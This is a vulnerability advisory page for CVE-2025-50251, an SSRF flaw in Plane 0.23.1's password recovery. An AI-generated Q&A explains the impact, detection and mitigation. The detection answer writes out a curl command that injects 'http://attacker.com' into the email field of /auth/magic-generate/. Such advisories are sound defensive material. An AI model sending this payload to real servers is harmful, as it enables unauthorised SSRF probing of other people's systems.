CVE-2025-50251
BaseFortify
Publication date: 2025-08-13
Last updated on: 2025-08-13
Assigner: MITRE
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| makeplane | plane | 0.23.1 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-918 | The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
This vulnerability is a Server-Side Request Forgery (SSRF) in the Plane application version 0.23.1, specifically in its password recovery functionality. An attacker can manipulate the email input field during password recovery or login to inject a malicious payload. This causes the server to send HTTP requests to attacker-controlled domains, allowing the attacker to monitor and capture these requests, potentially leading to further attacks or information disclosure. [1]
How can this vulnerability impact me? :
The vulnerability can allow an attacker to make the server send HTTP requests to arbitrary domains controlled by the attacker. This can lead to information disclosure, unauthorized internal network scanning, or further exploitation of internal services. It may also enable attackers to bypass security controls by leveraging the server's trust relationships. [1]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by monitoring for unusual or crafted POST requests to the endpoint `/auth/magic-generate/` containing manipulated email fields in the JSON payload. One way to detect exploitation attempts is to capture and analyze HTTP traffic targeting this endpoint. For example, using curl to simulate or detect such requests: `curl -X POST https://<target>/auth/magic-generate/ -H 'Content-Type: application/json' -d '{"email":"http://attacker.com"}'`. Network monitoring tools or intrusion detection systems can be configured to alert on such suspicious POST requests to `/auth/magic-generate/` with unusual email field values. [1]
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include restricting or validating input on the password recovery email field to prevent SSRF payloads, applying any available patches or updates from the Plane application repository for version 0.23.1, and monitoring or blocking outgoing HTTP requests from the server to untrusted domains. Additionally, consider implementing network-level controls to restrict server outbound HTTP requests to only trusted destinations until a patch is applied. [1]